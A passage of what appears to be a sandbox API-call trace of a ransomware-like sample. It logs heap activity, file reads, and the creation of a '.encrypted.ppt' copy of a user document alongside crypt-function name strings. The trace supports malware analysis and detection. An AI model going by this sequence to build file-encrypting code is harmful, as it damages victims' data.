dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.encrypted.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\vp6fryq8wd7hsrbchzv.encrypted.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.221] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.223] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.223] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0035.225] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x3eda, lpOverlapped=0x0) returned 1 [0035.225] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13eda) returned 0x955018 [0035.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13eda) returned 0x968f00 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.228] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13eda) returned 0x955018 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.228] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.228] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.229] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13eda) returned 0x955018 [0035.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0035.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0035.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0035.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13eda) returned 0x97cde8 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.231] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.232] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.232] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.233] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.234] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.235] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 